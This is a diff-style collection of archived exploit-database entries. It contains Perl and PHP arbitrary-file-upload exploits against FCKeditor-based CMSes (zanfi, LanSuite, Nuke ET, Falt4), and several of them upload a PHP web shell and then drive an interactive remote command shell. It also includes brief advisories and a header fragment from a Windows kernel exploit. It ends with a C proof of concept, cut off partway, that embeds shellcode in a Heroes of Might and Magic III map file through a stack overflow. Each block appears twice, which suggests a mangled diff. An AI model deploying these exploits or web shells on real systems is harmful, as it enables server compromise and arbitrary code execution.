@ -1,42 +1,42 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload xpl +
+ +
+Discovered by :reptil +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
##############################################################
##############################################################
*
*you can use this and upload files !
*
*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################
# milw0rm.com [2008-09-10]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload xpl +
+ +
+Discovered by :reptil +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
##############################################################
##############################################################
*
*you can use this and upload files !
*
*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################
# milw0rm.com [2008-09-10]


@ -1,47 +1,47 @@
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# svvateam@yahoo.com
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# milw0rm.com [2008-09-12]
########################################################################
#
# S.W.A.T.
#
# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
#
# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
#
# Discover by : S.W.A.T.
#
# svvateam@yahoo.com
#
# Impact: Medium
#
# Fix: Disable It In The Config File ;)
#
# Site: wWw.SvvaT.IR
#
########################################################################
####################
- Exploit:
####################
http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Demo:
####################
http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- GreTzZ :
####################
All My Friend's , Str0ke
####################
# milw0rm.com [2008-09-12]


@ -1,28 +1,28 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-09-25]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-09-25]


@ -1,132 +1,132 @@
<?php
/*
---------------------------------------------------------------
Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
---------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.truzone.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
147. function FileUpload( $resourceType, $currentFolder )
148. {
149. $sErrorNumber = '0' ;
150. $sFileName = '' ;
151.
152. if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
153. {
154. $oFile = $_FILES['NewFile'] ;
155.
156. // Map the virtual path to the local server path.
157. $sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
158.
159. // Get the uploaded file name.
160. $sFileName = $oFile['name'] ;
161. $sOriginalFileName = $sFileName ;
162. // Security fix by truzone 01-15-2006
163. //$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
164. //$sExtension = strtolower( $sExtension ) ;
165.
166. if(extension_loaded("mime_magic")){
167. $sExtension = mime_content_type($oFile['tmp_name']);
168. }else{
169. $sExtension = $oFile['type'];
170. }
171. // en of security fix by truzone 01-15-2006
172. global $Config ;
173.
174. $arAllowed = $Config['AllowedExtensions'][$resourceType] ;
175. $arDenied = $Config['DeniedExtensions'][$resourceType] ;
An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /nukeet/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nnukeet-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-18]
<?php
/*
---------------------------------------------------------------
Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
---------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.truzone.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
147. function FileUpload( $resourceType, $currentFolder )
148. {
149. $sErrorNumber = '0' ;
150. $sFileName = '' ;
151.
152. if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
153. {
154. $oFile = $_FILES['NewFile'] ;
155.
156. // Map the virtual path to the local server path.
157. $sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
158.
159. // Get the uploaded file name.
160. $sFileName = $oFile['name'] ;
161. $sOriginalFileName = $sFileName ;
162. // Security fix by truzone 01-15-2006
163. //$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
164. //$sExtension = strtolower( $sExtension ) ;
165.
166. if(extension_loaded("mime_magic")){
167. $sExtension = mime_content_type($oFile['tmp_name']);
168. }else{
169. $sExtension = $oFile['type'];
170. }
171. // en of security fix by truzone 01-15-2006
172. global $Config ;
173.
174. $arAllowed = $Config['AllowedExtensions'][$resourceType] ;
175. $arDenied = $Config['DeniedExtensions'][$resourceType] ;
An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /nukeet/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nnukeet-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-18]


@ -1,51 +1,51 @@
########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]
########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]


@ -1,95 +1,95 @@
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /Falt4/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nFalt4-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2009-02-16]
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function connector_response($html)
{
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /Falt4/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nFalt4-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2009-02-16]


@ -6,6 +6,8 @@
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal

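--- /dev/null
+++ b/platforms/windows/local/37716.c
@@ -0,0 +1,272 @@
+/*
+# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
+# Date : 2015-07-29
+# Exploit Author : John AAkerblom, Pierre Lindblad
+# Website: http://h3minternals.net
+# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
+# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
+# Tested on : Windows XP, Windows 8.1
+# Category: exploits
+# Description:
+This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes
+of Might and Magic III. Once the map is started in-game, a buffer overflow
+occuring when loading object sprite names leads to shellcode execution.
+Only basic arbitrary code execution is covered in this PoC but is possible to
+craft an exploit that lets the game continue normally after the shellcode has
+been executed. Using extensive knowledge of the .h3m format, it is even
+possible to create a map file that loads like normal in the game's map editor
+(which lacks the vulnerability) but stealthily executes shellcode when opened
+in-game.
+*/
+#include <string.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
+0xEBFE added at end. Note that a NULL-less payload is not actually needed
+Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+and Peter Ferrie <peter.ferrie@gmail.com>
+All rights reserved.
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+* Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+* Redistributions in binary form must reproduce the above copyright
+notice, this list of conditions and the following disclaimer in the
+documentation and/or other materials provided with the distribution.
+* Neither the name of the copyright holder nor the names of the
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
+INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
+AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
+static const uint8_t CALC_PAYLOAD[] = {
+0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
+0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
+0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
+0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
+0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
+0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
+0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
+};
+/*
+* The memmem() function finds the start of the first occurrence of the
+* substring 'needle' of length 'nlen' in the memory area 'haystack' of
+* length 'hlen'.
+*
+* The return value is a pointer to the beginning of the sub-string, or
+* NULL if the substring is not found.
+*
+* Original author: caf, http://stackoverflow.com/a/2188951
+*/
+static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
+{
+uint8_t needle_first;
+uint8_t *p = haystack;
+size_t plen = hlen;
+if (!nlen)
+return NULL;
+needle_first = *(uint8_t *)needle;
+while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
+{
+if (!memcmp(p, needle, nlen))
+return p;
+p++;
+plen = hlen - (p - haystack);
+}
+return NULL;
+}
+#ifdef _MSC_VER
+#pragma warning(disable:4996) // M$ fopen so unsafe
+#endif
+#pragma pack(push, 1)
+// exploit struct
+// .h3m files contain an array of object attributes - OA - in which each
+// entry starts with a string length and then a string for an object sprite.
+// This exploit overflows the stack with a malicious sprite name.
+struct exploit_oa_t
+{
+uint32_t size; // size of the rest of this struct, including shellcode
+// The rest of the struct is the sprite name for the OA, <size> bytes of
+// which an CALL ESP-gadget address is placed so that it overwrites the
+// return address, when ESP is called shellcode2 will be executed. An
+// additional 2 "anticrash" gadgets are needed so the game does not crash
+// before returning to the CALL ESP-gadget.
+uint8_t nullbyte; // Must be 0x00, terminating sprite name
+uint8_t overwritten[6]; // Overwritten by game
+uint8_t shellcode1[121]; // Mostly not used, some is overwritten
+uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
+// anticrash_gadget1, needs to pass the following code down to final JMP:
+//
+// MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+// XOR EBX, EBX
+// CMP EAX, EBX
+// JE SHORT <crash spot> ; JMP to crash if EAX is 0
+// MOV CL, BYTE PTR DS : [EAX - 1]
+// CMP CL, BL
+// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
+// CMP CL, 0FF
+// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
+// CPU Disasm
+// CMP EDI, EBX
+// JNE <good spot> ; JMP to good spot. Always occurs if we get this far
+uint32_t anticrash_gadget1;
+// anticrash_gadget2, needs to return out of the following call (tricky):
+//
+// MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+// CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+uint32_t anticrash_gadget2;
+// Here at 144 bytes into this struct comes the shellcode that will be
+// executed. For the game to survive, it is wise to use this only for a
+// short jmp as doing so means only 2 values have to be restored on the
+// stack. Namely: original return address and format value of the h3m.
+// This PoC simply puts shellcode here, meaning the game cannot continue
+// after shellcode execution.
+uint8_t shellcode2[];
+};
+struct offsets_t
+{
+uint32_t call_esp_gadget;
+uint32_t anticrash_gadget1;
+uint32_t anticrash_gadget2;
+};
+#pragma pack(pop)
+static const struct offsets_t * const TARGET_OFFSETS[] = {
+(struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
+(struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
+};
+#define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
+" 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
+#define MAX_TARGET 2
+// Name of a sprite present in all maps, this is overwritten with exploit
+#define NEEDLE "AVWmrnd0.def"
+int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
+{
+uint8_t *buf = NULL;
+uint8_t *p = NULL;
+long h3m_size = 0;
+long bytes = 0;
+struct exploit_oa_t *exp = NULL;
+// Read entire h3m file into memory
+fseek(h3m_f, 0, SEEK_END);
+h3m_size = ftell(h3m_f);
+rewind(h3m_f);
+buf = malloc(h3m_size);
+if (buf == NULL) {
+puts("[!] Failed to allocate memory");
+return 1;
+}
+bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
+if (bytes != h3m_size) {
+free(buf);
+puts("[!] Failed to read all bytes");
+return 1;
+}
+// Find game object array in .h3m, where we will overwrite the first entry
+p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
+if (p == NULL) {
+puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
+free(buf);
+return 1;
+}
+// Move back 4 bytes from sprite name, pointing to the size of the sprite name
+p -= 4;
+// Overwrite the first game object with exploit
+exp = (struct exploit_oa_t *)p;
+exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
+exp->nullbyte = 0;
+exp->call_esp_gadget = ofs->call_esp_gadget;
+exp->anticrash_gadget1 = ofs->anticrash_gadget1;
+exp->anticrash_gadget2 = ofs->anticrash_gadget2;
+memcpy(exp->shellcode2, payload, payload_size);
+// Write entire file from memory and cleanup
+rewind(h3m_f);
+bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
+if (bytes != h3m_size) {
+free(buf);
+puts("[!] Failed to write all bytes");
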